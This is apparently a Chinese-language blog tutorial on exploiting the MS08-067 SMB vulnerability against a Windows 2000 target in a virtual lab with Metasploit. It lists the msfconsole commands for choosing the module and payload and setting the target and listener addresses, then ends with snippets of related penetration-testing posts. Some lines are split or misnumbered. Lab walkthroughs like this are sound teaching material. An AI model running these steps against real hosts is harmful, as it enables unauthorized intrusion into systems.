exploit:攻擊者利用應用服務的安全漏洞進行的一次攻擊。exploit模組就是存在漏洞的模組。
payload:滲透之後希望被執行的**
2.1.1 wmware station 10.0以上
2.1.2 置虛擬機器組成虛擬區域網
windows 2000作為靶機系統
設定靶機和訪問機在區域網段:192.168.1.0
2.2.1 選擇可利用模組
search windows/smb/ms08_067_netapi 或
show exploits;
use windows/smb/ms08_067_netapi.
2.2.2 選擇在該模組下可以利用的payloads
(windows/smb/ms08_067_netapi) show payloads;
(windows/smb/ms08_067_netapi) s
et payload ;
2.2.3 選擇攻擊目標
(windows/smb/ms08_067_netapi) show targets
2.2.4 根據模組需要的引數進行設定引數
(windows/smb/ms08_067_netapi)show options
(windows/smb/ms08_067_netapi)set rhost 192.168.1.2(靶機)
(windows/smb/ms08_067_netapi)set lhost 192.168.1.3
(windows/smb/ms08_067_netapi)set lport 8080(任意)
2.2.5 進行攻擊
(windows/smb/ms08_067_netapi)exploit
2.2.5 進行微調
實際工作注意問題:
啟動較慢;
注意英文下才能輸入;
Metasploit滲透工具介紹
metasploit是一款開源的安全漏洞檢測工具。由於metasploit是免費的工具,因此安全工作人員常用metasploit工具來檢測系統的安全性。metasploit framework msf 是2003 年以開放源 方式發布 可自由獲取的開發框架,這個環境為滲透測試 shellcode 編...
Metasploit滲透日記(一)
配置網路 硬體要求 pc一台,配置可能要好一些 可選 路由器乙個 軟體要求 vmware workstation fusion kali linux amd64位虛擬機器映象 安裝kali linux虛擬機器 開啟vmware建立虛擬機器,典型 填寫映象儲存目錄 作業系統選擇linux底下的debi...
Metasploit滲透日記(五)
web應用滲透 sql注入之手工注入篇 專案要求 硬體要求 pc 一台,配置可能要好一些 可選 路由器乙個 軟體要求 vmware workstation fusion 任意的網頁瀏覽器 專案步驟 初探漏洞網 接下來就進入到dvwa的頁面,我們主要使用的是左邊的sql injection選項裡面的內...